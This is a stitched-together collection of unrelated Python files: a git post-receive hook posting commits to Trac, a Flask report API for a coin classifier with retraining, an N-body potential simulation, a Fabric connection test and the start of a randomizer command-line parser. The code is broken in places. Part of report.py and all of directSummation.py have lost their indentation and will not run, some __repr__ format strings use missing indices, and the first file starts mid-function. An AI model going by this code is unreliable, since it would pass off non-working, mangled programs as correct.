                  logger=log, cd=None,
                  stdout_level=logging.INFO,
                  stderr_level=logging.WARNING, **kwargs) :
    """Equivalent to subprocess.Popen except log stdout and stderr
    where appropriate. Also log the command being called.

    When a stream argument is left as None and a logger is given, that
    stream is piped and drained by a background thread that logs each
    line at the corresponding level.  The monitor threads are attached
    to the returned Popen object as .stdout_thread / .stderr_thread.
    """
    #we use None as sigil values for stdin,stdout,stderr above so we
    # can distinguish from the caller passing in Pipe.
    if(logger):
        #if we are logging, record the command we're running,
        #trying to strip out passwords (any arg starting with '-p').
        logger.debug("Running cmd: %s",
                     isinstance(cmd,str) and cmd
                     or subprocess.list2cmdline([i for i in cmd
                                                 if not i.startswith('-p')]))
    if cd :
        #subprocess does this already with the cwd arg,
        #convert cd over so as not to break anyone's.
        kwargs['cwd']=cd
    p = subprocess.Popen(cmd, stdin=stdin,
                         stdout=(stdout or (logger and PIPE)),
                         stderr=(stderr or (logger and PIPE)),
                         **kwargs)
    if logger :
        def monitor(level, src, name) :
            # Build a sub-logger name like "<logger>.<cmd>.out" so the
            # child's output is attributable in the log.
            lname = "%s.%s" % (cmd[0], name)
            if(hasattr(logger, 'name')) :
                lname = "%s.%s" % (logger.name, lname)
            sublog = logging.getLogger(lname)
            def tfn() :
                # Drain the pipe line by line until EOF, logging each line.
                l = src.readline()
                while l != "":
                    sublog.log(level,l.strip())
                    l = src.readline()
            th = threading.Thread(target=tfn,name=lname)
            # Expose the monitor thread on the Popen object for callers.
            p.__setattr__("std%s_thread" % name, th)
            th.start()
        # Only monitor streams the caller did not redirect themselves.
        if stdout == None : monitor(stdout_level, p.stdout,"out")
        if stderr == None : monitor(stderr_level, p.stderr,"err")
    return p
def gitPopen(gitdir, cmd, **kwargs):
    """Popen git with the given command and the git-dir given. kwargs
    are passed onwards to popen."""
    full_cmd = ["git", "--git-dir=" + gitdir]
    full_cmd.extend(cmd)
    return capturedPopen(full_cmd, logger=log, **kwargs)
def find_all_refs(gitdir):
    "Get a list of all ref names in the git database, i.e. any head or tag name"
    show_ref = gitPopen(gitdir, ["show-ref"], stdout=PIPE)
    refs = set()
    # Each show-ref line is "<sha> <refname>"; keep the refname column.
    for line in show_ref.stdout:
        refs.add(line.split()[1])
    return refs
def new_commits(gitdir, ref_updates) :
    """For the given gitdir and list of ref_updates (an array that
    holds [oldrev,newrev,refname] arrays) find any commit that is new
    to this repo.

    This works primarily by issuing a:
      git rev-list new1 ^old1 new2 ^old2 ^refs/tags/foo ^refs/heads/bar

    This function yields commits that are new in the format:
      [hash, author, date, message]
    """
    #the set of previously reachable roots starts as a list of all
    #refs currently known, which is post-receive so we will need to
    #remove some from here. Everything left will become ^refs.
    prev_roots = find_all_refs(gitdir)
    log.debug("Found %s named refs", len(prev_roots))
    #open the rev-list process and make a writer function to it.
    grl = gitPopen(gitdir, ["rev-list","--reverse", "--stdin",
                            "--pretty=tformat:%an <%ae>%n%ci%n%s%n%+b"],
                   stdin=PIPE, stdout=PIPE)
    def w(ref) : grl.stdin.write(ref + "\n")
    for (old,new,ref) in ref_updates :
        #branch deletion: newval is 00000, skip the ref, leave it in
        #the list of prev_roots
        if re.match("^0+$",new) : continue
        #Include the newrev as now reachable.
        w(new)
        #a ref that is being updated should be removed from the
        #previous list and ...
        prev_roots.discard(ref)
        #instead write out the negative line directly. However, if it
        #is a new branch (denoted by all 0s) there is no negative to
        #include for this ref.
        # NOTE(review): "[1-9]" tests for any decimal digit 1-9; a sha
        # made only of 0s and hex letters a-f would be misclassified as
        # a new branch -- confirm whether "[^0]" was intended.
        if re.search("[1-9]",old) :
            w("^" + old)
        else :
            log.info("New ref %r", ref)
    log.debug("After discarding updates, writing %s prev_roots",
              len(prev_roots))
    #write lines for (not reachable from anything else')
    for ref in prev_roots : w("^" + ref)
    grl.stdin.close()
    ### this is a little parser for the rev-list output format:
    #commit <hash>
    #<Author>
    #<Date>
    #<msg>
    #<blank line>
    commit = None
    msg = ""
    def finish() :
        # Attach the accumulated message to the current commit record.
        commit.append(msg[:-1]) #-1 to strip one \n from the pair.
        log.info("New commit: %r", commit)
        return commit
    while True :
        line = grl.stdout.readline()
        #blank line and exit code set, we're done here.
        if line == '' and grl.poll() != None :
            if commit: yield finish()
            log.debug("Exiting loop: %s", grl.poll())
            break
        m = re.match("commit ([0-9a-f]+)$", line)
        if m : #start of a new commit
            if commit: yield finish()
            log.debug("Starting new commit: %s", m.group(1))
            hash = m.group(1)
            # The pretty format guarantees author and date on the next
            # two lines, then the subject/body begins.
            author = grl.stdout.readline().strip()
            date = grl.stdout.readline().strip()
            commit = [hash,author,date]
            msg = grl.stdout.readline()
        else :
            msg += line
def post(commits, gitdir, cname, trac_env):
    """Post each new commit to trac via the trac-post-commit helper."""
    for [rev, author, date, msg] in commits:
        # The helper subprocess uses python logging with the same
        # formatter, so tell it not to log and pass our streams through;
        # its logging then just falls in line with ours.
        log.debug("Posting %s to trac", rev)
        args = ["python", TRAC_POST_COMMIT,
                "-p", trac_env or "",
                "-r", rev,
                "-u", author,
                "-m", msg,
                cname]
        capturedCall(args,
                     logger=None,
                     stdout=sys.stdout,
                     stderr=sys.stderr)
def process(gitdir, cname, trac_env, ref_updates):
    """Find commits new to the repo among *ref_updates* and post them to trac."""
    # BUG FIX: the log line referenced the module-global 'updates' (only
    # defined when run as a script -- a NameError when called as a library);
    # use the ref_updates parameter instead.
    log.info("Push by %r; CNAME: %r, TRAC_ENV: %r, updating %s refs",
             getpass.getuser(), cname, trac_env, len(ref_updates))
    post(new_commits(gitdir, ref_updates), gitdir, cname, trac_env)
    log.info("Finished commit hook loop, git-post-receive")
#################################################################
#### Runtime control
# Command-line options (also used when run as a git hook with no args).
parser = OptionParser(""" """)
parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
                  help="Show more verbose log messages.")

if __name__ == "__main__":
    (options, args) = parser.parse_args()
    # when run as a hook the directory is the git repo:
    #   either /var/git/ServerManagement.git
    #   or     /var/git/ServerManagement/.git
    gitdir = os.getcwd()
    cname = os.getenv("CNAME")
    if cname == None:
        if len(args) >= 1:
            cname = args.pop(0)
        else:
            # strip off .git if it is bare or /.git if it is a checkout.
            # BUG FIX: raw string -- "\." in a plain string is an invalid
            # escape sequence (DeprecationWarning, later SyntaxError).
            cname = re.sub(r"/?\.git$", "", gitdir)
            cname = os.path.basename(cname)
    TRAC_ENV = os.getenv("TRAC_ENV") or os.path.join("/var/trac/", cname)
    #### Logging configuration
    log.setLevel(logging.DEBUG)
    ## log verbosely to a file
    logfile = os.path.join(logdir, "%s.git-post-receive.log" % cname)
    fh = logging.FileHandler(logfile, mode='a')
    fh.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)-8s %(message)s',
                                      datefmt='%Y%m%d %H:%M:%S'))
    ## and to standard error keep the level higher
    sh = logging.StreamHandler()
    sh.setLevel(options.verbose and logging.DEBUG or logging.INFO)
    sh.setFormatter(logging.Formatter("%(asctime)s %(name)s %(levelname)-8s %(message)s",
                                      datefmt='%H:%M:%S'))
    log.addHandler(sh)
    log.addHandler(fh)
    log.info("----- git-post-receive.py -----")
    # Where will we be posting to?
    if not os.path.exists(TRAC_ENV):
        # BUG FIX: use the configured module logger and the non-deprecated
        # warning() (was logging.warn on the root logger, which bypassed
        # the handlers configured above); message typo fixed too.
        log.warning("Nonexistent trac_env: %s", TRAC_ENV)
        TRAC_ENV = None
    # actually read the ref updates from stdin, one
    # "<oldrev> <newrev> <refname>" triple per line.
    updates = [line.split() for line in sys.stdin]
    process(gitdir, cname, TRAC_ENV, updates)
# # The MIT License
# # Copyright (c) 2010 Acceleration.net
# # Permission is hereby granted, free of charge, to any person obtaining a copy
# # of this software and associated documentation files (the "Software"), to deal
# # in the Software without restriction, including without limitation the rights
# # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# # copies of the Software, and to permit persons to whom the Software is
# # furnished to do so, subject to the following conditions:
# # The above copyright notice and this permission notice shall be included in
# # all copies or substantial portions of the Software.
# # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# # THE SOFTWARE.
|
report.py | from datetime import datetime
from os import makedirs, path, remove
from os.path import join, exists
from shutil import rmtree
from flask import Blueprint, Response, request
from flask.helpers import send_file
from threading import Thread
from modules.AI.classifier_trainer import ClassifierTrainer
from services.classifier import ClassifierService
import json
import uuid
from shutil import copyfile
from services.settings import SettingsService
from services.users import UsersService
# Flask blueprint exposing the /report endpoints.
reports = Blueprint('reports', __name__)
# Application settings persisted in settings.json in the working directory.
SETTINGS_FILE = path.sep.join(["settings.json"])
SETTINGS = SettingsService(SETTINGS_FILE)
# Firebase-backed user/report bookkeeping and the active classifier service.
USERS = UsersService()
CLASSIFIER = ClassifierService()
# GET /report?id=<uuid>
@reports.route('/report')
def report():
user_id = USERS.getUserId(request)
if user_id is None:
return Response(status=401)
# get report id from request
if 'id' in request.args:
id = request.args['id']
# Not the owner
if not isOwner(user_id, id):
return Response(status=403)
path = join(SETTINGS.getReportFolder(), id, 'data.json')
# check if report exists
if (not exists(path)):
return Response(status=404)
# just send the report data file
return send_file(path, mimetype='application/json')
return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# GET /report/image?id=<id>
# GET /report/image?id=<id>&zone=<id>
@reports.route('/report/image')
def report_image():
    """Serve a report image: one zone crop, or the whole report picture.

    401 without a user, 403 when the user does not own the report,
    500 when no id is supplied.
    """
    # We need an user id to proceed with firebase storage methods
    user_id = USERS.getUserId(request)
    if user_id is None:
        return Response(status=401)
    # get zone image (need report id & zone id)
    path = None
    if 'id' in request.args and 'zone' in request.args:
        id = request.args['id']
        # Not the owner
        if not isOwner(user_id, id):
            return Response(status=403)
        zone = request.args['zone']
        # NOTE(review): existence is not checked here; a missing zone file
        # surfaces as an error from send_file below -- confirm intended.
        path = join(SETTINGS.getReportFolder(), id, 'zones', str(zone) + '.png')
    # get report image (need report id 'debug' or 'normal')
    elif 'id' in request.args:
        id = request.args['id']
        # Not the owner
        if not isOwner(user_id, id):
            return Response(status=403)
        # check if 'debug' is requested
        file = "detections.png" if ('debug' in request.args and request.args['debug']) else "original.png"
        path = join(SETTINGS.getReportFolder(), id, file)
        # if 'debug' is requested, check if the file exists
        # else, return the original file
        if (not exists(path)):
            path = join(SETTINGS.getReportFolder(), id, 'original.png')
    # if 'path' is not None, send the image
    if (path is not None):
        return send_file(path, mimetype='image/png')
    return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# DELETE /report?uid=<uid>&id=<uuid>
@reports.route('/report', methods=['DELETE'])
def delete_report():
    """Delete a report (its folder on disk and its firebase entry)."""
    # We need an user id to proceed with firebase storage methods
    user_id = USERS.getUserId(request)
    if user_id is None:
        return Response(status=401)
    if 'id' in request.args:
        id = request.args['id']
        path = join(SETTINGS.getReportFolder(), id)
        # Retrieve list from firebase
        reports = USERS.getReports(user_id)
        owner = False
        # Check if the report is owned by the user; pop it out of the
        # list in the same pass so setReports() below persists the removal.
        for (i, report) in enumerate(reports):
            if report['id'] == id:
                reports.pop(i)
                owner = True
                break
        # Not the owner
        if not owner:
            return Response(status=403)
        # Delete report folder if the user is the owner
        rmtree(path)
        # BUG FIX: the old reports.remove(id) crashed with ValueError --
        # the entry (a dict, not an id string) was already removed by
        # reports.pop(i) above.
        # Tell firebase to update
        USERS.setReports(user_id, reports)
        # Return success
        return Response("{'success': true}", status=200, mimetype='application/json')
    return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# PUT /report/?id=<uuid>&zone=<zone_id>
# Update zone and make correction, need to set confidence to 0, to recalculate score
# TODO: Add image that are incorrect to our Dataset automatically
@reports.route('/report', methods=['PUT'])
def report_put():
    """Correct the coin classification of one zone of a report.

    Expects a JSON body containing 'coin' ('{class}_{face}', e.g.
    '1e_front').  Maintains the correction dataset and the error counter,
    may kick off a background retraining, then recomputes the report's
    calculated total and score and rewrites data.json.
    """
    # We need an user id to proceed with firebase storage methods
    user_id = USERS.getUserId(request)
    if user_id is None:
        return Response(status=401)
    # edit zone result (need report id & zone id)
    if 'id' in request.args and 'zone' in request.args:
        id = request.args['id']
        zone = int(request.args['zone'])
        # Not the owner
        if not isOwner(user_id, id):
            return Response(status=403)
        # Check if the coin is in the data body of the request
        if 'coin' in request.json:
            coin = request.json['coin']
            # coin is like '1e_front'
            # '{class}_{face}'
            coinParts = coin.split('_') # split parts
            # We need only 2 parts, not less or more
            if (len(coinParts) != 2):
                return Response("{'success': false, 'message': 'Incorrect format'}", status=500, mimetype='application/json')
            # Check that the coin is in the list of valid coins
            if (coinParts[0] not in SETTINGS.getCoins()):
                return Response("{'success': false, 'message': 'Incorrect coin'}", status=500, mimetype='application/json')
            # Check that the face is in the list of valid faces
            if (coinParts[1] not in ['back','front']):
                return Response("{'success': false, 'message': 'Incorrect side'}", status=500, mimetype='application/json')
            # PATH of the data
            path = join(SETTINGS.getReportFolder(), id, 'data.json')
            # Check if the report exists
            if (not exists(path)):
                return Response(status=404)
            # Load the data from the file
            data = json.load(open(path))
            # retrieve the zone
            for zone_data in data['zones']:
                if zone_data['id'] == zone:
                    # Make path to dataset folder
                    addToDataset = False
                    # Path of folder, if is already in the generated dataset
                    oldDataset_path = join(SETTINGS.getDatasetFolder(), zone_data['coin'])
                    # Path of folder, in case if is not in the generated dataset
                    newDataset_path = join(SETTINGS.getDatasetFolder(), coin)
                    # Create the folder if it does not exist
                    if (not exists(oldDataset_path)):
                        makedirs(oldDataset_path)
                    if (not exists(newDataset_path)):
                        makedirs(newDataset_path)
                    # Build path of the image
                    oldDataset_path = join(oldDataset_path, '%s_%d.png' % (id, zone))
                    newDataset_path = join(newDataset_path, '%s_%d.png' % (id, zone))
                    # Backup the original data (only on the first correction)
                    if "old_coin" not in zone_data:
                        zone_data['old_coin'] = zone_data['coin']
                        zone_data['old_confidence'] = zone_data['confidence']
                        # Need to add to our generated dataset
                        addToDataset = True
                    # Restore the original data if the new coin is the same than the old one
                    if zone_data['old_coin'] == coin:
                        # Remove from generated dataset
                        # because the new coin is the same than the old one so the AI didn't make a mistake
                        if exists(oldDataset_path):
                            remove(oldDataset_path)
                        # Restore the old data
                        zone_data['coin'] = zone_data['old_coin']
                        zone_data['confidence'] = zone_data['old_confidence']
                        # Delete the old data from json
                        del zone_data['old_coin']
                        del zone_data['old_confidence']
                        # Decrease the error count
                        SETTINGS.decErrorCount()
                    # Else, that mean the AI made a mistake
                    # need to null the old data
                    else:
                        # Remove from generated dataset
                        # in case of the previous coin was also edited and marked as incorrect
                        # ex: initial : 2e_front,
                        #     request 1 : change to '1e_front'
                        #     request 2 : change to '1e_back'
                        if exists(oldDataset_path):
                            # Decrease the error count if the old coin was also edited
                            SETTINGS.decErrorCount()
                            # Remove the old image
                            remove(oldDataset_path)
                        # Null the old data (confidence 0 forces the score
                        # recomputation below to ignore the AI's certainty)
                        zone_data['coin'] = coin
                        zone_data['confidence'] = 0.0
                        # Need to add to our generated dataset
                        addToDataset = True
                        # Increase the error count
                        SETTINGS.incErrorCount()
                    # Add the image to the dataset if needed and the coin is not a null coin
                    if (addToDataset and coinParts[0] != '0'):
                        # if is not already in training and check if error count is enought to make a new training
                        if (not SETTINGS.isTraining() and SETTINGS.getErrorCount() >= SETTINGS.getTrainAfter()):
                            # Try to start a new Thread to don't interrupt the API
                            try:
                                thread = Thread(target=trainModel)
                                thread.daemon = True
                                thread.start()
                                print("Started training")
                                SETTINGS.setTraining(True)
                            except:
                                # If an error occurs, set the training to false to cancel it
                                SETTINGS.setTraining(False)
                                pass
                        # Copy the coin image to the correct dataset folder
                        copyfile(join(SETTINGS.getReportFolder(), id, "zones", "%d.png" % zone), join(SETTINGS.getDatasetFolder(), coin, '%s_%d.png' % (id, zone)))
                    break
            # Update the values
            # Calculated, score
            data['calculated'] = 0
            data['score'] = 0.0
            for zone_data in data['zones']:
                # zone_data['coin'] is like '1e_front', need to split to get the coin value
                data['calculated'] += SETTINGS.getCoins()[zone_data['coin'].split('_')[0]]
                data['score'] += zone_data['confidence']
            # if number of coins is 0, useless to calculate the score
            if (len(data['zones']) > 0):
                data['score'] /= len(data['zones'])
            # Update the file
            with open(path, 'w') as f:
                json.dump(data, f)
            return Response("{'success': true}", status=200, mimetype='application/json')
    return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
def isOwner(user_id, report_id):
    """Return True if *report_id* belongs to *user_id*'s firebase reports."""
    # Retrieve list from firebase
    reports = USERS.getReports(user_id)
    # NOTE(review): delete_report treats each entry as a dict with an 'id'
    # key, while this compares the entry to the id directly -- confirm the
    # stored schema is consistent.
    for report in reports:
        if report == report_id:
            return True
    # Robustness fix: explicit False instead of implicitly returning None
    # (both are falsy, so caller behavior is unchanged).
    return False
def trainModel():
    """Train a new classifier model on the generated dataset, persist its
    metadata, and make it the active model.  Returns the model file path."""
    id = str(uuid.uuid4())
    print("Training model %s..." % id)
    # PATH to each file
    modelPath = join(SETTINGS.getModelFolder(), id)
    modelTrainedPath = join(modelPath, "model.h5")
    modelInfoPath = join(modelPath, "info.json")
    # BUG FIX: create the model folder *before* training -- the trainer
    # writes model.h5 into it, which failed while the folder did not exist
    # (it was previously created only after train() returned).
    if (not exists(modelPath)):
        makedirs(modelPath)
    # Retrieve the images count for each label
    imgCount = ClassifierTrainer().train(modelTrainedPath, SETTINGS.getLabel(), SETTINGS.getDatasetFolder(), SETTINGS.getTrainEpochs())
    modelInfo = {
        'id': id,
        'pictures_count': imgCount,
        'datetime': datetime.now().isoformat()
    }
    # Dump the file
    with open(modelInfoPath, 'w') as f:
        json.dump(modelInfo, f)
    print("Model %s trained" % id)
    # update config
    CLASSIFIER.getClassifier().setModel(modelTrainedPath)
    return modelTrainedPath
|
directSummation.py | """
A Program to compute and plot N Body simulation for learning purposes (Following Prof. Barba's Group)
@author : Vijai Kumar
@email : vijai@vijaikumar.in
"""
# Import the necessary libraries
import numpy as np
import matplotlib.pylab as plt
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from itertools import cycle
from funcy import flatten
import datetime
import time
import multiprocessing
# Matplotlib Globals
# NOTE: usetex=True requires a working LaTeX installation at plot time.
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# A simple data structure for storing the point
class Point():
"""
A Simple point structure that holds a point or could create a random point
"""
def __init__(self, coordinates=list(), domain=1.0):
self.domain = domain
if coordinates:
self.x = coordinates[0]
self.y = coordinates[1]
self.z = coordinates[2]
else:
self.x = self.domain * np.random.random()
self.y = self.domain * np.random.random()
self.z = self.domain * np.random.random()
def getNumpyArray(self):
return np.array([self.x,self.y,self.z])
def distance(self, other):
xDiff = other.x - self.x
xSquared = xDiff * xDiff
yDiff = other.y - self.y
ySquared = yDiff * yDiff
zDiff = other.z - self.z
zSquared = zDiff * zDiff
dist = np.sqrt(xSquared + ySquared + zSquared)
return dist
def __str__(self):
return ("{0}(Coordinates->( {1} / {2} / {3} ),Domain->{4})".format(self.__class__.__name__, self.x, self.y, self.z,self.domain))
def __repr__(self):
return ("{0},{1},{2},{4}".format(self.x, self.y, self.z,self.domain))
# A Particle class
class Particle(Point):
"""
A Simple structure to hold a particle and all of its neighbours
"""
def __init__(self, coordinates=list(), domain=1.0, mass=0.1, idx=None):
Point.__init__(self, coordinates=coordinates, domain=domain)
self.m = mass
self.domain = domain
self.Neighbours = list()
self.idx = idx
self.phi = 0.0
def getId(self):
return self.idx
def addNeighbour(self, Neighbour):
self.Neighbours.append(Neighbour)
def getNeighBours(self):
return self.Neighbours
def getNeighBoursCount(self):
return len(self.Neighbours)
def __str__(self):
return ("{0}(Idx->{1},Coordinates->( {2} / {3} / {4} ),Mass->{5},Potential->{6})".format(self.__class__.__name__, self.idx, self.x, self.y, self.z,self.m,self.phi))
def __repr__(self):
return ("{0},{1},{2},{4},{5},{6}".format(self.x, self.y, self.z,self.domain,self.mass,self.idx))
# Create random particles
def createParticles(n):
particles = list()
for i in range(1,n):
particle = Particle(mass=(1.0/i),idx=i)
particles.append(particle)
return particles
# Compute neighbour for 1 particle
def findNeighbourForSingleParticle(currentParticle, particleArray,tolerance):
for part in particleArray:
if part != currentParticle:
distance = currentParticle.distance(part)
if (distance < tolerance) or (distance == tolerance):
currentParticle.addNeighbour(part)
# Multithreaded version of compute neighbours (Not really required in this code)
def createParticlesAndComputeNeighbours(n,tolerance):
particles = createParticles(n)
jobs = list()
for particle in particles:
currentParticle = particle
p = multiprocessing.Process(target=findNeighbourForSingleParticle, args=(currentParticle,particles,tolerance))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
return particles
# Compute potential for 1 particle
def directSummationForSingleParticle(currentTarget,particleList,sharedVariable):
for source in particleList:
if source != currentTarget: # To avoid self contribution
radius = currentTarget.distance(source)
currentTarget.phi = currentTarget.phi + (source.m/radius)
sharedVariable.append(currentTarget.phi)
# Direct summation code (Multithreaded)
def directSummation(particleList):
jobs = list()
manager = multiprocessing.Manager()
sharedVariable = manager.list()
for target in particleList:
currentTarget = target
p = multiprocessing.Process(target=directSummationForSingleParticle, args=(currentTarget,particleList,sharedVariable))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
targetCounter = 0
for target in particleList:
target.phi = sharedVariable[targetCounter]
targetCounter = targetCounter + 1
# Plot the N body result
def plotParticles(particles):
fig = plt.figure(figsize=(20.0, 10.0))
plt.subplots_adjust(top=0.986,bottom=0.014,left=0.007,right=0.993,hspace=0.2,wspace=0.2)
# left plot
ax = fig.add_subplot(1,2,1, projection='3d')
ax.scatter([particle.x for particle in particles],
[particle.y for particle in particles],
[particle.z for particle in particles], s=30, c='b')
ax.set_xlim3d(0,1)
ax.set_ylim3d(0,1)
ax.set_zlim3d(0,1)
ax.set_xlabel(r'$X Axis$')
ax.set_ylabel(r'$Y Axis$')
ax.set_zlabel(r'$Z Axis$')
ax.set_title(r'$\textsc{Particle Distribution}$')
# right plot
ax = fig.add_subplot(1,2,2, projection='3d')
scale = 50 # scale for dot size in scatter plot
ax.scatter([particle.x for particle in particles],
[particle.y for particle in particles],
[particle.z for particle in particles],
s=np.array([particle.phi for particle in particles])*scale, c='b')
ax.set_xlim3d(0,1)
ax.set_ylim3d(0,1)
ax.set_zlim3d(0,1)
ax.set_xlabel(r'$X Axis$')
ax.set_ylabel(r'$Y Axis$')
ax.set_zlabel(r'$Z Axis$')
ax.set_title(r'\textsc{Particle Distribution (Radius implies potential)}')
plt.savefig('potential_direct_summation.pdf')
if __name__ == "__main__":
numberOfParticles = 100
tolerance = 0.15
particles = createParticlesAndComputeNeighbours(numberOfParticles,0.15)
directSummation(particles)
plotParticles(particles) |
concurrency.py | import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from pytest import skip
from fabric import Connection
_words = "/usr/share/dict/words"
def _worker(queue, cxn, start, num_words, count, expected):
    """Read *count* words starting at offset *start* over *cxn* and push
    (cxn, words, expected) onto *queue* for the main thread to verify."""
    lines_from_end = num_words - start
    command = "tail -n {} {} | head -n {}".format(lines_from_end, _words, count)
    output = cxn.run(command, hide=True).stdout
    words = [line.strip() for line in output.splitlines()]
    queue.put((cxn, words, expected))
class concurrency:
    # TODO: still useful to use Group API here? Where does this responsibility
    # fall between Group and Executor (e.g. phrasing this specifically as a
    # generic subcase of Invoke level task parameterization)?
    # TODO: spin up multiple temp SSHDs / Paramiko servers / ???

    def setup(self):
        cxn1 = Connection("localhost")
        cxn2 = Connection("localhost")
        cxn3 = Connection("localhost")
        self.cxns = (cxn1, cxn2, cxn3)

    def connections_objects_do_not_share_connection_state(self):
        cxn1, cxn2, cxn3 = self.cxns
        [x.open() for x in self.cxns]
        # Prove no exterior connection caching, socket reuse, etc
        # NOTE: would phrase these as chained 'is not' but pep8 linter is being
        # stupid :(
        assert cxn1 is not cxn2
        assert cxn2 is not cxn3
        assert cxn1.client is not cxn2.client
        assert cxn2.client is not cxn3.client
        # NOTE(review): 'is not' compares int identity here; '!=' would be
        # the usual comparison for port numbers -- confirm intent.
        ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
        assert ports[0] is not ports[1] is not ports[2]

    def manual_threading_works_okay(self):
        # TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
        # before it will reliably pass
        skip()
        # Kind of silly but a nice base case for "how would someone thread this
        # stuff; and are there any bizarre gotchas lurking in default
        # config/context/connection state?"
        # Specifically, cut up the local (usually 100k's long) words dict into
        # per-thread chunks, then read those chunks via shell command, as a
        # crummy "make sure each thread isn't polluting things like stored
        # stdout" sanity test
        queue = Queue()
        # TODO: skip test on Windows or find suitable alternative file
        with codecs.open(_words, encoding="utf-8") as fd:
            data = [x.strip() for x in fd.readlines()]
        threads = []
        num_words = len(data)
        # BUG FIX: use floor division -- plain '/' yields a float on
        # Python 3 and float slice indices raise TypeError below.
        chunksize = len(data) // len(self.cxns)
        for i, cxn in enumerate(self.cxns):
            start = i * chunksize
            # BUG FIX: the original used max(), which made every chunk run
            # to the end of the file; cap normal chunks and hand the
            # division remainder to the last connection.
            if i == len(self.cxns) - 1:
                end = num_words
            else:
                end = min([start + chunksize, num_words])
            chunk = data[start:end]
            kwargs = dict(
                queue=queue,
                cxn=cxn,
                start=start,
                num_words=num_words,
                count=len(chunk),
                expected=chunk,
            )
            thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
            threads.append(thread)
        for t in threads:
            t.start()
        for t in threads:
            t.join(5)  # Kinda slow, but hey, maybe the test runner is hot
        while not queue.empty():
            cxn, result, expected = queue.get(block=False)
            for resultword, expectedword in zip_longest(result, expected):
                err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
                    resultword, expectedword, cxn, expected[0], expected[-1]
                )
                assert resultword == expectedword, err
|
main.py | import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
    """argparse type= converter for the dungeon-goal option.

    Accepts 'seashells'/'raft' (returned verbatim), a single number
    ('open', -1..8 -> int), a range like 'open-6' or '1-4' (-> range),
    or 'random' (alias for the full 'open'..8 range).
    Raises ArgumentTypeError on anything else.
    """
    if goal == "random":
        goal = "-1-8"
    elif goal in ("seashells", "raft"):
        return goal
    parsed = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
    if parsed is None:
        raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
    first, second = parsed.group(1), parsed.group(2)
    # 'open' is shorthand for -1.
    begin = int("-1" if first == "open" else first)
    final = int(second) if second else begin
    if not (-1 <= begin <= 8) or not (-1 <= final <= 8):
        raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
    if final == begin:
        return begin
    if final < begin:
        raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
    return range(begin, final + 1)
def main(mainargs=None):
    """Command-line entry point for the randomizer.

    Parses arguments and runs exactly one action: map export, empty plan
    dump, spoiler-log dump/test, or (the default) seed generation.

    mainargs -- optional argument list (defaults to sys.argv[1:]); the
                signature is unchanged so existing callers keep working.
    """
    import argparse
    import sys
    parser = argparse.ArgumentParser(description='Randomize!')
    parser.add_argument('input_filename', metavar='input rom', type=str,
        help="Rom file to use as input.")
    parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
        help="Output filename to use. If not specified [seed].gbc is used.")
    parser.add_argument('--dump', dest="dump", type=str, nargs="*",
        help="Dump the logic of the given rom (spoilers!)")
    parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
        help="Sets the output format for the generated seed's spoiler log")
    parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
        help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
    parser.add_argument('--test', dest="test", action="store_true",
        help="Test the logic of the given rom, without showing anything.")
    parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
        help="Generate the specified seed")
    parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
        help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
    parser.add_argument('--exportmap', dest="exportmap", action="store_true",
        help="Export the map (many graphical mistakes)")
    parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
        help="Write an unfilled plan file")
    parser.add_argument('--timeout', type=float, required=False,
        help="Timeout generating the seed after the specified number of seconds")
    parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
        help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
    # Flags that affect gameplay
    parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
        help="Read an item placement plan")
    parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
        help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
    parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
        help="Which level of logic is required.")
